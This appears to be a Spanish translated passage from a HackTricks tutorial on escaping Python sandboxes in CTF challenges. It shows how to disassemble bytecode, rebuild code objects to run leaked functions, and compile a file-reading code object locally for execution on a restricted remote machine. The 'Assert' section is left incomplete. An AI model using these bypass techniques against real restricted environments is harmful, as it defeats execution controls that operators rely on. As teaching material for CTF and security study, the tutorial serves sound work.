Ten en cuenta que si no puedes importar dis en el sandbox de Python, puedes obtener el bytecode de la función (get_flag.func_code.co_code) y desensamblarlo localmente. No podrás ver el contenido de las variables que se cargan (LOAD_CONST), pero puedes deducirlas a partir de (get_flag.func_code.co_consts), ya que LOAD_CONST también indica el desplazamiento de la variable que se carga.

dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S')
0 LOAD_CONST          1 (1)
3 STORE_FAST          1 (1)
6 LOAD_CONST          2 (2)
9 STORE_FAST          2 (2)
12 LOAD_CONST          3 (3)
15 LOAD_CONST          4 (4)
18 BUILD_LIST          2
21 STORE_FAST          3 (3)
24 LOAD_FAST           0 (0)
27 LOAD_FAST           2 (2)
30 COMPARE_OP          2 (==)
33 POP_JUMP_IF_FALSE    40
36 LOAD_CONST          5 (5)
39 RETURN_VALUE
>>   40 LOAD_CONST          6 (6)
43 RETURN_VALUE
44 LOAD_CONST          0 (0)
47 RETURN_VALUE

Compilando Python

Ahora, imaginemos que de alguna manera puedes obtener la información sobre una función que no puedes ejecutar pero que necesitas ejecutar.
Como en el siguiente ejemplo, puedes acceder al objeto de código de esa función, pero solo leyendo el desensamblado no sabes cómo calcular la bandera (imagina una función calc_flag más compleja).

def get_flag(some_input):
var1=1
var2="secretcode"
var3=["some","array"]
def calc_flag(flag_rot2):
return ''.join(chr(ord(c)-2) for c in flag_rot2)
if some_input == var2:
return calc_flag("VjkuKuVjgHnci")
else:
return "Nope"

Creando el objeto de código

En primer lugar, necesitamos saber cómo crear y ejecutar un objeto de código para poder crear uno y ejecutar nuestra función filtrada:

code_type = type((lambda: None).__code__)
# Check the following hint if you get an error in calling this
code_obj = code_type(co_argcount, co_kwonlyargcount,
co_nlocals, co_stacksize, co_flags,
co_code, co_consts, co_names,
co_varnames, co_filename, co_name,
co_firstlineno, co_lnotab, freevars=None,
cellvars=None)

# Execution
eval(code_obj) #Execute as a whole script

# If you have the code of a function, execute it
mydict = {}
mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")

{% hint style="info" %} Dependiendo de la versión de Python, los parámetros de code_type pueden tener un orden diferente. La mejor manera de conocer el orden de los parámetros en la versión de Python que estás utilizando es ejecutar:

import types
types.CodeType.__doc__
'code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n      flags, codestring, constants, names, varnames, filename, name,\n      firstlineno, lnotab[, freevars[, cellvars]])\n\nCreate a code object.  Not for the faint of heart.'

{% endhint %}

Recreando una función filtrada

{% hint style="warning" %} En el siguiente ejemplo, vamos a tomar todos los datos necesarios para recrear la función directamente del objeto de código de la función. En un ejemplo real, todos los valores para ejecutar la función code_type es lo que necesitarás filtrar. {% endhint %}

fc = get_flag.__code__
# In a real situation the values like fc.co_argcount are the ones you need to leak
code_obj = code_type(fc.co_argcount, fc.co_kwonlyargcount, fc.co_nlocals, fc.co_stacksize, fc.co_flags, fc.co_code, fc.co_consts, fc.co_names, fc.co_varnames, fc.co_filename, fc.co_name, fc.co_firstlineno, fc.co_lnotab, cellvars=fc.co_cellvars, freevars=fc.co_freevars)

mydict = {}
mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")
#ThisIsTheFlag

Bypassar Defensas

En los ejemplos anteriores al comienzo de esta publicación, puedes ver cómo ejecutar cualquier código de Python utilizando la función compile. Esto es interesante porque puedes ejecutar scripts completos con bucles y todo en una sola línea (y podríamos hacer lo mismo usando exec).
De todos modos, a veces puede ser útil crear un objeto compilado en una máquina local y ejecutarlo en la máquina del CTF (por ejemplo, porque no tenemos la función compile en el CTF).

Por ejemplo, compilaremos y ejecutaremos manualmente una función que lee ./poc.py:

#Locally
def read():
return open("./poc.py",'r').read()

read.__code__.co_code
't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S'
#On Remote
function_type = type(lambda: None)
code_type = type((lambda: None).__code__) #Get <type 'type'>
consts = (None, "./poc.py", 'r')
bytecode = 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S'
names = ('open','read')

# And execute it using eval/exec
eval(code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ()))

#You could also execute it directly
mydict = {}
mydict['__builtins__'] = __builtins__
codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ())
function_type(codeobj, mydict, None, None, None)()

Si no puedes acceder a eval o exec, podrías crear una función adecuada, pero llamarla directamente generalmente fallará con: constructor no accesible en modo restringido. Por lo tanto, necesitas una función que no esté en el entorno restringido para llamar a esta función.

#Compile a regular print
ftype = type(lambda: None)
ctype = type((lambda: None).func_code)
f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdin', 'f', 1, ''), {})
f(42)

Descompilación de Python compilado

Utilizando herramientas como https://www.decompiler.com/ uno puede descompilar el código de Python compilado dado.

Echa un vistazo a este tutorial:

{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} .pyc.md {% endcontent-ref %}

Python Misceláneo

Assert

Python ejecutado con optimizaciones con el parámetro -O eliminará las declaraciones de aserción y cualquier código condicional en función del valor de debug.
Por lo tanto, las comprobaciones como

def check_permission(super_user):
try:
assert(super_user)
print("\nYou are a super user\n")
except AssertionError:
print(f"\nNot a Super User!!!\n")

Referencias

Encuentra las vulnerabilidades que más importan para que puedas solucionarlas más rápido. Intruder rastrea tu superficie de ataque, realiza escaneos de amenazas proactivas, encuentra problemas en toda tu pila tecnológica, desde APIs hasta aplicaciones web y sistemas en la nube. Pruébalo gratis hoy.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}


☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥